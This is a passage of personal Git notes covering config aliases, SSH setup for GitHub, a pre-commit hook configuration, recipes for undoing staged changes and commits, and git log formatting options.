autocrlf = input
safecrlf = true
[alias]
co = checkout
br = branch
ci = commit
s = status
last = log -1 HEAD
lg = log --graph
url = remote get-url --all origin
.ssh/config
ssh-keygen -t rsa -b 4096 -C "youremail"
host *
AddKeysToAgent yes
UseKeychain yes
TCPKeepAlive yes
ServerAliveInterval 60
ServerAliveCountMax 5
host github.com
user git
hostname github.com
port 22
identityfile ~/.ssh/id_rsa
5.2.4 - Git Hook
pre-commit
# https://pre-commit.com/#usage
pip install pre-commit pre-commit-hooks
# write to .git/hooks/pre-commit
pre-commit install
exclude: >
  (?x)(
    ^a/|
    ^b/c/|
    ^d/e/__init__.py
  )
default_language_version:
  python: python3
repos:
  - repo: https://github.com/PyCQA/isort
    rev: 5.9.3 # tag
    hooks:
      - id: isort # sort imports
  - repo: https://github.com/psf/black
    rev: stable
    hooks:
      - id: black # code formatter
  - repo: https://github.com/pycqa/flake8
    rev: 4.0.1
    hooks:
      - id: flake8 # check the style and quality
        language_version: python2.7
        stages: [manual]
pre-push
5.2.5 - Git How-To
undo untracked
git reset --hard <commit_id>
# show which will be removed, include untracked directories
# -n --dry-run, Don't actually remove anything
git clean -d -n
# delete anyway, no confirm
git clean -d -f
undo not staged change
(removal or modification)
# in stage space but changed by external
# touch a && git add a && rm a, then a has not-staged changes
# discard changes in working directory
git restore <files>
# or
git checkout <files>
# update what will be committed
git add <files>
# caused by removal
git rm <files>
# or
git rm --cached <files>
undo add
# undo stage
git restore --staged <files>
# remove from staged space
git rm --cached d
undo commit
# message
git commit --amend -m 'message which will cover the old one'
# undo commit, but not undo add
# --soft, do not touch the index file nor the working tree
# --hard, match the working tree and index to the given tree
# --mixed, reset the index but not the working tree (default)
git reset --soft HEAD^
# undo <n> commits
git reset --soft HEAD~n
merge commit
# reapply n commits
git rebase -i HEAD~n
# pick
# squash
# ...
# squash
git add .
git rebase --continue
# git rebase --abort
git push --force
delete the last commit
# where git interprets x^ as the parent of x
# + as a forced non-fastforward push.
git push origin +<second-last-commit>^:master
# or
git reset HEAD^ --hard
git push origin master -f
delete the second last commit
# this will open an editor and show a list of all commits since the commit we want to get rid of
# simply remove the line with the offending commit, likely that will be the first line
git rebase -i <second-last-commit>^
git push origin master -f
5.2.6 - Git Log
status
git init --bare /path/to/repo/.git
# git remote add origin /path/to/repo/.git
git clone /path/to/repo
# show paths that differ between the working directory and the current HEAD commit
git status
# --short
# A added.c
# M modified.cc
# R renamed.h
# D deleted.hh
git status -s
diff
# compare the working directory with the staging area
git diff
# --cached: compare staged changes against the last commit
git diff --staged
git diff oldCommit..newCommit
log
# list the commits made in this repository, newest first
git log
# -p, patch output: show the diff introduced by each commit
# -2 show only the last two entries
# --stat print, below each commit entry, the list of modified files, how many files changed, and how many lines were added and removed
# --shortstat show only the changed/insertions/deletions line of --stat
# --pretty=oneline print each commit on a single line
git log --pretty=oneline
# short hash - author name, date : subject
git log --pretty=format:"%h - %an, %ar : %s"
# --graph add a nice little ASCII graph showing the branch and merge history
git log --pretty=format:"%h %s" --graph
git log -<n>
# --since, --after
# --until, --before
git log --since=2.weeks
git log --since="2008-01-15"
git log --since="2 years 1 day 3 minutes ago"
# --committer: the user who made the commit
# --author: the user who authored the change
# search commit messages for a keyword
git log --author=<author> --grep="keyword"
# --author and --grep may each be given multiple times;
# this limits the output to commits matching any --author pattern and any --grep pattern
# --all-match further limits the output to commits matching all --grep patterns
# show only commits that add or remove code matching the string
git log -S function_name
Useful options for git log --pretty=format
Option | Description of Output |
---|---|
%H | Commit hash |
%h | Abbreviated commit hash |
%T | Tree hash |
%t | Abbreviated tree hash |
%P | Parent hashes |
%p | Abbreviated parent hashes |
%an | Author name |
%ae | Author email |
%ad | Author date (format respects the --date= option) |
%ar | Author date, relative |
%cn | Committer name |
%ce | Committer email |
%cd | Committer date |
%cr | Committer date, relative |
%s | Subject |